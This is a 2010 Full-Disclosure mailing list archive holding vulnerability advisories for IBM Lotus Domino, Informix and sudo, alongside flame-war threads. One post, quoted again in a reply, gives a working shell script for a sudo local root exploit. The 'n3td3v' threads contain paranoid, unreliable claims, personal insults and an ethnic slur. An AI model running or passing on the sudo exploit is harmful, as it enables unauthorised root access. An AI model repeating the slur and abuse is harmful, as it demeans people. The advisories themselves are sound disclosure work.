[Full-disclosure] iDefense Security Advisory 03.02.10: IBM Lotus Domino Web Access ActiveX Stack Buffer Overflow Vulnerability

[iDefense Labs]

iDefense Security Advisory 03.02.10
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 02, 2010

I. BACKGROUND

IBM Lotus Domino includes an ActiveX control called Domino Web Access,
which provides Web-based access for Lotus Notes users. The control
features functionality that is used for uploading files and clearing
the cache upon logout. For more information, see the vendor's site
found at the following link.

http://www-01.ibm.com/software/lotus/products/inotes/

II. DESCRIPTION

Remote exploitation of a stack-based buffer overflow vulnerability in
IBM Corp.'s Lotus Domino Web Access ActiveX control could allow an
attacker to execute arbitrary code with the privileges of the current
user.

 The vulnerabe function takes an attacker-controlled URL, and copies it
into a fixed-size stack buffer. No validation checks are performed on
the length of the URL. By passing in a long URL string, it is possible
to trigger a stack-based buffer overflow, resulting in the execution of
arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user viewing the Web page. To exploit
this vulnerability, a targeted user must load a malicious Web page
created by an attacker. An attacker typically accomplishes this via
social engineering or injecting content into compromised, trusted
sites. After the user visits the malicious Web page, no further user
interaction is needed.

The vulnerability is a stack-based buffer overflow, and there are no
compiler/runtime protections such as stack cookies or safe exception
handling in the module. As such, reliable exploitation is trivial.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Lotus
Domino Web Access version 8.0.2. Previous versions may also be
affected. The libraries that contain the vulnerable code are dwa8.dll
and dwa8w.dll. IBM states that Lotus Domino Web Access versions 6.5,
7.0 and 8.0 are affected.

V. WORKAROUND

The vulnerable ActiveX controls can be disabled in Internet Explorer by
setting the kill bit for the following CLSIDs:

{3BFFE033-BF43-11d5-A271-00A024A51325}
{983A9C21-8207-4B58-BBB8-0EBC3D7C5505}
{E008A543-CEFB-4559-912F-C27C2B89F13B}

VI. VENDOR RESPONSE

IBM has released a solution which addresses this issue. Information
about downloadable vendor updates can be found by clicking on the URLs
shown.

http://www-01.ibm.com/support/docview.wss?rs=463&uid=swg21421808

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

09/18/2008  Initial Vendor Notification
09/24/2008  Initial Vendor Reply
03/02/2010  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Elazar Broad.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2010 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I have been threatened.

[Rohit Patnaik]

Valdis,

Man, why do you even bother responding to this troll?  I mean, I find your
response amusing (as always), but doesn't it eat up a fair amount of your
time to keep responding to this guy?


On Mon, Mar 1, 2010 at 5:07 PM,  wrote:

> On Mon, 01 Mar 2010 22:39:56 GMT, intel unit said:
>
> > SOMEONE HELP.
>
> Take your meds and call us in the morning.  Seriously.
>
> > Yahoo probably hired assassins to take me out. This is probably
> > going to end up on valleywag or something.
>
> (a) Apply Occam's Razor - which is simpler and more likely, that your sorry
> ass is in fact being targeted by Yahoo assassins because you know Important
> Stuff, or you're just having another paranoid episode that manifests as
> thinking assassins are after you because you know Important Stuff? (Hint 1:
> what in the cited text implies assassins?  Zero. Hint 2: What are the
> chances
> that you're valuable enough to be worth a bullet plus the plane ticket for
> the assassin, and you're still unable to get a job in the field?)
>
> (b) Why do you rate a mention on valleywag if it actually happens?
>
> > Sorry guys. I won't be coming back.
>
> ... Yeah, we've heard THAT
> before.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] full disclosure is an intelligence blackhole

[McGhee, Eddie]

Give yourself a break, schizoid. 

-Original Message-
From: intel unit [mailto:n3t...@hush.ai] 
Sent: 01 March 2010 14:53
To: full-disclosure@lists.grok.org.uk; McGhee, Eddie
Subject: RE: [Full-disclosure] full disclosure is an intelligence blackhole

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

back off kid

"n3td3v" is trying to save lives here

yahoo messenger has 0days. now if gadi evron and the mossad were to get onto 
that, it wouldn't be a good thing, now would it?

On Mon, 01 Mar 2010 08:53:53 + "McGhee, Eddie"
 wrote:
>Come on mate seriously its getting boring, if any serious security 
>threats are out there then drop the info and man up, stop with the 
>bullshit of making netdev a poor internet meme, because that's all it 
>is..
>
>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full- 
>disclosure-boun...@lists.grok.org.uk] On Behalf Of intel unit
>Sent: 01 March 2010 08:06
>To: full-disclosure@lists.grok.org.uk
>Subject: [Full-disclosure] full disclosure is an intelligence blackhole
>
>-BEGIN PGP SIGNED MESSAGE-
>Hash: SHA1
>
>John Cartwright is perpetrating global conflict by censoring n3td3v's 
>0days and commenting.
>Opinion by Andrew Wallace. Published by a believer in free speech who 
>knows Andrew Wallace is an super spy expert. Luyk a jelly samwich 
>amirite?
>
>
>Is banning people from a mailing list a national security risk?
>
>We haven't been on the mailing list since January 2009, although there 
>have been plenty of hackers trying to impersonate us.
>
>For sure the impersonations are misleading, and we would like to ask, 
>is banning people from a mailing list a vulnerability?
>
>Let's just say we haven't been able to release any information to the 
>public for over a year now.
>
>We don't have anywhere we can post information.
>
>Isn't it a security risk to ban one the biggest security & intelligence 
>groups in the UK from posting?
>
>We think so, and why would you want to create a climate where there are 
>plenty n3td3v wanna be's posting to the mailing list, but no actual 
>intelligence on what we're upto, what we've been researching or 
>anything like that.
>
>A security & intelligence group with over 6000 security professionals 
>in jobs around the world who make up the n3td3v group, banned from 
>making announcements relating to national security matters.
>
>A whole year of no information getting out to the security industry 
>about the vulnerabilities in national security and other research that 
>we've been getting upto.
>
>None of that has been post, its all been supressed.
>
>By who? One man decided to risk security by banning one of the largest 
>security groups in the United Kingdom.
>
>We were treated badly on the mailing list, it wasn't us in the wrong, 
>we only defended ourselves and the integrity of our group from people 
>who were obviously wanting an argument.
>
>We aren't playing around, we are grown adults who are serious about 
>security & intelligence.
>
>We were made out to be something that we weren't, its not nice to be 
>treated like that.
>
>It's why the mailing list can't be taken seriously and poses a risk to 
>national security.
>
>Because the people who do research security aren't able to post on the 
>mailing list.
>
>And I don't know why more people haven't spoken out about an 
>organisation as big as n3td3v being banned from the mailing list, its a 
>risk to national security.
>
>We don't post our intelligence anywhere else apart from the mailing 
>list we've been banned from, and we don't give out any signals 
>intelligence about what we are getting upto, we're very careful about 
>that.
>
>The only opportunity to find out what the n3td3v security and 
>intelligence group were upto was being subscribed to the mailing list 
>and reading our emails.
>
>Andrew is banned, and banned with that are the voices of over 6000 and 
>more researchers, security consultants and many others.
>
>Is banning n3td3v from Full-disclosure mailing list a national security 
>issue? Of course it is.
>
>National security has been at risk for over a year and will remain at 
>risk... because the information flow has been cut off.
>
>Who will be to blame? One man who runs the mailing list, one man will 
>need to live with himself, his name is John Cartwright.
>
>He has cut off a major security research and intelligence group on 
>purpose, I don't think he cares about national security.
>
>Can he live with himself?
>
>We've been sitting in our offices wondering this for over a year, we've 
>held security conferences with our members and other stuff and remain 
>frustrated that we've been cut off from communicating with the security 
>industry.
>
>Yours faithfully,
>
>n3td3v security
>& intelligence group
>-BEGIN PGP SIGNATURE-
>Charset: UTF8
>Note: This signature can be verified at 
>https://www.hushtools.com/verify
>Version: Hush 3.0
>
>wpwEAQMCAAYFAkuLdX8ACgkQwGoky+I7EouDgAP5AUjZ2+mKCx4dduWJlNWgAN8Iwnk
>L
>Pq

Re: [Full-disclosure] Internet Exploiter 2 - bypassing DEP

[Larry Seltzer]

Thanks SkyLined. I was confused a bit but I held off writing anything
till I understood it better. 

 

Getting back on to the point I think you were trying to make, you imply
that 32-bit address space is insufficient for the randomization in ASLR.
Actually now don't they only use 256 randomization slots? The point of
it is that if you're going to crash the system 255 out of 256 times it's
not worth attacking.

 

Larry Seltzer

 

From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
Berend-Jan Wever
Sent: Monday, March 01, 2010 7:41 PM
To: Full-disclosure; bugt...@securityfocus.com
Subject: Re: [Full-disclosure] Internet Exploiter 2 - bypassing DEP

 

It seems my English is not as good as I thought and I accidentally led
Ryan Naraine  , Larry Seltzer
  and probably others to come to conclusions such as that I released
a weaponized 0-day that bypasses both ASLR+DEP in current versions of
MSIE and Windows using a completely new technique and that I did so as a
Google employee.

 

However, let me try to explain better and to correct any ambiguity I may
have created in my first blog post:

- I have recently released an exploit that I developed in 2005 (before I
was employed by either MS or Google).

- I am releasing this as an individual as part of my new-years
resolution
  to
dump random stuff from my harddisk onto the tubes. (I have a personal
interest in security outside of my work, every now and then I find
enough time to work on and release stuff like this).

- The exploit targets a bug that was fixed in 2005
 , that only affected MSIE 6.0 and earlier.

- The exploit shows how to implement the well known ret-into-libc
technique (using a heap spray) to bypass DEP.

 

- The exploit does not contain anything that is not already public,
other than how to implement a ret-into-libc using a heap-spray to
exploit complex memory corruption bugs such as the DHTML race condition
it targets.

- The exploit does not bypass ASLR.

- Using ret-into-libc to bypass DEP affects any application that has a
vulnerability that allows an attacker to use a ret-into-libc attack -
this is not MSIE specific. 

 

I hope this helps clarify some things. But, not being a native English
speaker, I may inadvertently have said things completely wrong again. I
look forward to correcting my mistakes as they show up on other news
sites in the future.

 

Cheers,

SkyLined


Berend-Jan Wever 
http://skypher.com/SkyLined




On Mon, Mar 1, 2010 at 4:51 PM, Berend-Jan Wever
 wrote:

Hey all,

 

I released a version of my Internet Exploiter 2 exploit from 2005 that
bypasses DEP. If you are familiar with my Internet Exploiter series of
exploits and/or are interested in how to use heap-spraying to bypass
DEP, you may like this:

http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/

 

Cheers,

SkyLined


Berend-Jan Wever 
http://skypher.com/SkyLined

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Internet Exploiter 2 - bypassing DEP

[Berend-Jan Wever]

It seems my English is not as good as I thought and I accidentally led Ryan
Naraine , Larry
Seltzer
and
probably others to come to conclusions such as that I released a weaponized
0-day that bypasses both ASLR+DEP in current versions of MSIE and Windows
using a completely new technique and that I did so as a Google employee.

However, let me try to explain better and to correct any ambiguity I may
have created in my first blog post:
- I have recently released an exploit that I developed in 2005 (before I was
employed by either MS or Google).
- I am releasing this as an individual as part of my new-years
resolution
to
dump random stuff from my harddisk onto the tubes. (I have a personal
interest in security outside of my work, every now and then I find enough
time to work on and release stuff like this).
- The exploit targets a bug that was fixed in
2005,
that only affected MSIE 6.0 and earlier.
- The exploit shows how to implement the well known ret-into-libc technique
(using a heap spray) to bypass DEP.

- The exploit does not contain anything that is not already public, other
than how to implement a ret-into-libc using a heap-spray to exploit complex
memory corruption bugs such as the DHTML race condition it targets.
- The exploit does not bypass ASLR.
- Using ret-into-libc to bypass DEP affects any application that has a
vulnerability that allows an attacker to use a ret-into-libc attack - this
is not MSIE specific.

I hope this helps clarify some things. But, not being a native English
speaker, I may inadvertently have said things completely wrong again. I look
forward to correcting my mistakes as they show up on other news sites in the
future.

Cheers,
SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined



On Mon, Mar 1, 2010 at 4:51 PM, Berend-Jan Wever
wrote:

> Hey all,
>
> I released a version of my Internet Exploiter 2 exploit from 2005 that
> bypasses DEP. If you are familiar with my Internet Exploiter series of
> exploits and/or are interested in how to use heap-spraying to bypass DEP,
> you may like this:
> http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/
>
> Cheers,
> SkyLined
> 
> Berend-Jan Wever 
> http://skypher.com/SkyLined
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching

[root]

Malisimo

Kingcope wrote:
> Just for the record.
> 
> ---snip---
> #!/bin/sh
> # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
> # local root exploit
> # March 2010
> # automated by kingcope
> # Full Credits to Slouching
> echo Tod Miller Sudo local root exploit
> echo by Slouching
> echo automated by kingcope
> if [ $# != 1 ]
> then
> echo "usage: ./sudoxpl.sh "
> exit
> fi
> cd /tmp
> cat > sudoedit << _EOF
> #!/bin/sh
> echo ALEX-ALEX
> su
> /bin/su
> /usr/bin/su
> _EOF
> chmod a+x ./sudoedit
> sudo ./sudoedit $1
> --snip---
> 
> cheers,
> kingcope
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo! UK and US Hiring Security and Risk management experts

[intel unit]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yahoo has a ton of cash and a lot of experience put into make a
great experience.

But they do have those embarrassing security flaws you just
mentioned.

Also, they're not even using cellphone calling or having real
people man cracked email accounts. Instead they let 15 year old
4channers backdoor you.

The most secure way to fortify your mail to scramble your forgotten
pw's, and if you do that, and you lose your pw, You're toast.

I'm sure yahoo also has some shitty last 4 # of your CC.

Google's way of doing it is superior. They hire pakis to do that
stuff.

Yahoo is amazing is many aspects (for years they had a great
directory, and even today have superb search), but I never had the
impression that security was their strongpoint.

I wouldn't trust my mail or personal data with them.

On Mon, 01 Mar 2010 23:23:24 + brian moore  wrote:
>On Sat, 27 Feb 2010 12:42:30 -0800
>mark seiden  wrote:
>
>> it's true that yahoo is hiring security people, though,
>typically not as consultants
>> but as employees -- programmers and engineers who are clueful
>about
>> security.
>
>Really?
>
>Cause they could sure use some (Considering the spam I get
>from Yahoo, where the
>Yahoo abuse people deny that web113903.mail.gq1.yahoo.com
>[98.136.167.123] is part of Yahoo.)
>
>I'd say you have a serious security problem, since if that's true,
>someone has compromised
>your DNS servers as well as records at ARIN that say Yahoo owns
>that network.
>
>Received: from n64.bullet.mail.sp1.yahoo.com
>(n64.bullet.mail.sp1.yahoo.com [98.136.44.189])
>   by mailhost.cmc.net (Postfix) with SMTP id 7CA5C29EB0A
>   for ; Tue, 23 Feb 2010 09:59:41 -0800 (PST)
>
>That didn't come from Yahoo, either, according to your employees.
>
>Received: from n21.bullet.mail.mud.yahoo.com
>(n21.bullet.mail.mud.yahoo.com [68.142.206.160])
>   by bert.cmc.net (Postfix) with SMTP id 805631F918
>   for ; Sat, 20 Feb 2010 06:31:13 -0800 (PST)
>
>That didn't come from Yahoo either...
>
>Looks like someone is totally having a field day with your DNS
>servers and ARIN, because it certainly
>can't be that your abuse staff is completely incompetent and
>ignoring spam complaints with lies
>about it not coming from Yahoo.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkuMUHAACgkQwGoky+I7Eot/eAP+OJyVxW9JDzx5iV514RrCF5DOTX27
KslqXFVIVpKWLN6PscX0kKrI9bansION8Zt7wJoKO4EIdupAbpdXih4OOXBEzdxKhw2R
Tjpj2NR715Es+3DPYX5Q0doYMVtgwEWZaBJZKVVoIyTMkhIoiIxyTIkhYipU4YchUBmj
Yc0zm5I=
=K5Og
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo! UK and US Hiring Security and Risk management experts

[brian moore]

On Sat, 27 Feb 2010 12:42:30 -0800
mark seiden  wrote:

> it's true that yahoo is hiring security people, though, typically not as 
> consultants
> but as employees -- programmers and engineers who are clueful about 
> security.  

Really?

Cause they could sure use some (Considering the spam I get from Yahoo, 
where the
Yahoo abuse people deny that web113903.mail.gq1.yahoo.com [98.136.167.123] is 
part of Yahoo.)

I'd say you have a serious security problem, since if that's true, someone has 
compromised
your DNS servers as well as records at ARIN that say Yahoo owns that network.

Received: from n64.bullet.mail.sp1.yahoo.com (n64.bullet.mail.sp1.yahoo.com 
[98.136.44.189])
by mailhost.cmc.net (Postfix) with SMTP id 7CA5C29EB0A
for ; Tue, 23 Feb 2010 09:59:41 -0800 (PST)

That didn't come from Yahoo, either, according to your employees.

Received: from n21.bullet.mail.mud.yahoo.com (n21.bullet.mail.mud.yahoo.com 
[68.142.206.160])
by bert.cmc.net (Postfix) with SMTP id 805631F918
for ; Sat, 20 Feb 2010 06:31:13 -0800 (PST)

That didn't come from Yahoo either...

Looks like someone is totally having a field day with your DNS servers and 
ARIN, because it certainly
can't be that your abuse staff is completely incompetent and ignoring spam 
complaints with lies
about it not coming from Yahoo.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching

[Kingcope]

Just for the record.

---snip---
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh "
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1
--snip---

cheers,
kingcope

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I have been threatened.

[Valdis . Kletnieks]

On Mon, 01 Mar 2010 22:39:56 GMT, intel unit said:

> SOMEONE HELP.

Take your meds and call us in the morning.  Seriously.

> Yahoo probably hired assassins to take me out. This is probably
> going to end up on valleywag or something.

(a) Apply Occam's Razor - which is simpler and more likely, that your sorry
ass is in fact being targeted by Yahoo assassins because you know Important
Stuff, or you're just having another paranoid episode that manifests as
thinking assassins are after you because you know Important Stuff? (Hint 1:
what in the cited text implies assassins?  Zero. Hint 2: What are the chances
that you're valuable enough to be worth a bullet plus the plane ticket for
the assassin, and you're still unable to get a job in the field?)

(b) Why do you rate a mention on valleywag if it actually happens?

> Sorry guys. I won't be coming back.

... Yeah, we've heard THAT 
before.


pgptA9yxdr6bc.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability

[ZDI Disclosures]

ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-023
March 1, 2010

-- CVE ID:
CVE-2009-2754

-- Affected Vendors:
IBM
EMC

-- Affected Products:
IBM Informix
EMC NetWorker

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5945. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of both IBM Informix Dynamic Server and EMC
Legato Networker. User interaction is not required to exploit this
vulnerability.

The specific flaw exists within the RPC protocol parsing library,
librpc.dll, utilized by the ISM Portmapper service (portmap.exe) bound
by default to TCP port 36890. During authentication, a lack of a proper
signedness check on a supplied parameter size can result in exploitable
stack based buffer overflow leading to arbitrary code execution under
the context of the SYSTEM user.

-- Vendor Responses:
IBM states:
This issue was first fixed in: IDS 10.00.TC9, IDS
11.10.TC3 Recommended fix pack version: IDS 10.00.TC10, IDS 11.10.TC3 4.
URL to APAR or fixpack Fix pack download URL:
http://www-933.ibm.com/support/fixcentral/
APAR URLs 
 http://www.ibm.com/support/docview.wss?uid=swg1IC55329
 http://www.ibm.com/support/docview.wss?uid=swg1IC55330EMC states:

EMC states:
EMC has released a Security Advisory (ESA-08-007) identifier to
customers through Powerlink.

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2010-03-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt (sebastian.ap...@siberas.de)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] I have been threatened.

[intel unit]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

MY NAME IS ANDREW WALLACE AND I AM BEING BUGGED OUT OF MY MIND BY
THE INTELLIGENCE ESTABLISHMENT.

SOMEONE HELP.

Yahoo probably hired assassins to take me out. This is probably
going to end up on valleywag or something.

Sorry guys. I won't be coming back.

- - Forwarded message from Henri Torgemane  -
- 
Hello, I was taken off list, but let me fwd this.

Thanks

- - Forwarded message from mark seiden  -
if you think i'm going to take you up on your troll and contaminate
the list
with something that doesn't interest them, you're wrong.

just go away.


On Feb 28, 2010, at 7:02 PM, Henri Torgemane wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Yes.
>
> To clarify, this post was meant to be satirical. It was not
written
> by an employee at Yahoo. I apologize for mentioning age. (In the
> United States, you're not allowed to mention age, creed, gender,
> etc. in terms of hiring new guys)
>
> However, I have a question for you Mark.
>
> What is your opinion on Andrew Wallace and "n3td3v"? Would Yahoo!
> consider vouching for him after all the high-value intel he's
given
> you?
>
>
> On Sat, 27 Feb 2010 20:42:30 + mark seiden 
> wrote:
>> yet another nice troll with a stylistic stench of n3td3v about
it,
>> judging by
>> the fanciful misconceptions surrounding a kernel of truth
>> (and the phony attribution to someone to whom he's taken an
>> unreasonable
>> disliking...)
>>
>> it's true that yahoo is hiring security people, though, typically
>> not as consultants
>> but as employees -- programmers and engineers who are clueful
>> about
>> security.
>>
>> careers.yahoo.com is a good way, in fact,  to find out about
those
>> jobs.  at rough count
>> 50 jobs in the US (mostly bay area) with the word "security" in
>> their abstract, and a
>> sizeable number in india, asia, and europe accessible off
separate
>> links.
>>
>> also, there are particularly numerous jobs for "service
>> engineering" pros,
>> people who are good at production services delivery at a very
>> large scale.
>>
>> if there are qualified applicants on this list (or your friends)
>> who want their name put
>> in for something particular, happy to refer them (i'd even get a
>> referral incentive).
>>
>> btw, please mention the  specific posted position(s) that you
>> think would suit you.
>>
>> (you don't have to be 25-35.  in fact, such a requirement would
>> not be
>> legal under US labor law...).
>>
>>
>> On Feb 27, 2010, at 9:25 AM, Henri Torgemane wrote:
>>
>>> -BEGIN PGP SIGNED MESSAGE-
>>> Hash: SHA1
>>>
>>>
>>> http://careers.yahoo.com/
>>>
>>> Looking for a dream job?
>>>
>>> Yahoo! is hiring security consultants worldwide 25-35 to help
>> join
>>> our new Cyber Security Task Force.
>>>
>>> We are working with the government to provide a security service
>>> for our web and messenger platforms. Especially people with
>>> experience harvesting vital intelligence, which is the life
>> blood
>>> of our security system. All aspects of security, risk
>> management,
>>> analysis. We embody the paranoid, professional spirit of
>>> corporatism. With delight (and muffins!)
>>>
>>> At Yahoo!, big thinking comes with the territory. When your work
>>> reaches over half a billion users--that's 1 out of every 2
>> people
>>> online--there's no small task. We need creative minds that can
>> take
>>> us new places. Individuals who want to positively impact their
>>> career--and the world at large. We're looking for Big Thinkers
>> who
>>> embody the fun, innovative, collaborative spirit that's uniquely
>>> Yahoo!.
>>>
>>> We're looking for people like you. To protect it.
>>>
>>> I look forward to seeing your applications. Let's protect our
>> data.
>>> Let's create the future, together.
>>>
>>> Henri Torgemane
>>> -BEGIN PGP SIGNATURE-
>>> Charset: UTF8
>>> Note: This signature can be verified at
>> https://www.hushtools.com/verify
>>> Version: Hush 3.0
>>>
>>>
>>
wpwEAQMCAAYFAkuJVZsACgkQuR8Y8cR7pG3otgP/XF4VY9U1UAaobymiyxEdfb3FWfc
>> 1
>>>
>>
qx/1tDAuUL7mMRzgex+Z3+IycD2BNAeDHBxXE60dq6hqIUSQJZfEqIzvncSp4QZNjg1
>> q
>>>
>>
O63YvCE0EcjzQbaqxC/nnG2gUZjzq8WY1aJnM0nP39SKOwcCzBL8TAykNzTaBZkc4f/
>> 8
>>> mntbvRg=
>>> =cKLr
>>> -END PGP SIGNATURE-
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> -BEGIN PGP SIGNATURE-
> Charset: UTF8
> Note: This signature can be verified at
https://www.hushtools.com/verify
> Version: Hush 3.0
>
>
wpwEAQMCAAYFAkuLLmEACgkQuR8Y8cR7pG2RAQP7BTAWAa8UU4aTEu/hKr1YlSLZuoxc
>
L57DqpFsP31NeX+3h7RhvLm5hyta6nmYgLZqNBKRxn7GK29l6kemP0nMOmNKpxr6

[Full-disclosure] ZDI-10-022: IBM Informix librpc.dll Multiple Remote Code Execution Vulnerabilities

[ZDI Disclosures]

ZDI-10-022: IBM Informix librpc.dll Multiple Remote Code Execution 
Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-10-022
March 1, 2010

-- CVE ID:
CVE-2009-2753

-- Affected Vendors:
IBM

-- Affected Products:
IBM Informix

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5937. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of both IBM Informix Dynamic Server and EMC
Legato Networker. User interaction is not required to exploit this
vulnerability.

The specific flaws exist within the RPC protocol parsing library,
librpc.dll, utilized by the ISM Portmapper service (portmap.exe) bound
by default to TCP port 36890. During authentication, a lack of proper
sanity checking on supplied parameter sizes can result in exploitable
stack and heap based buffer overflows leading to arbitrary code
execution under the context of the SYSTEM user.

-- Vendor Response:
IBM states that this issue was first fixed in: IDS 10.00.TC9, IDS
11.10.TC3 Recommended fix pack version: IDS 10.00.TC10, IDS 11.10.TC3 4.
URL to APAR or fixpack Fix pack download URL:
http://www-933.ibm.com/support/fixcentral/
APAR URLs 
 http://www.ibm.com/support/docview.wss?uid=swg1IC55329
 http://www.ibm.com/support/docview.wss?uid=swg1IC55330

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2010-03-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt (sebastian.ap...@siberas.de)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2010:052 ] sudo

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:052
 http://www.mandriva.com/security/
 ___

 Package : sudo
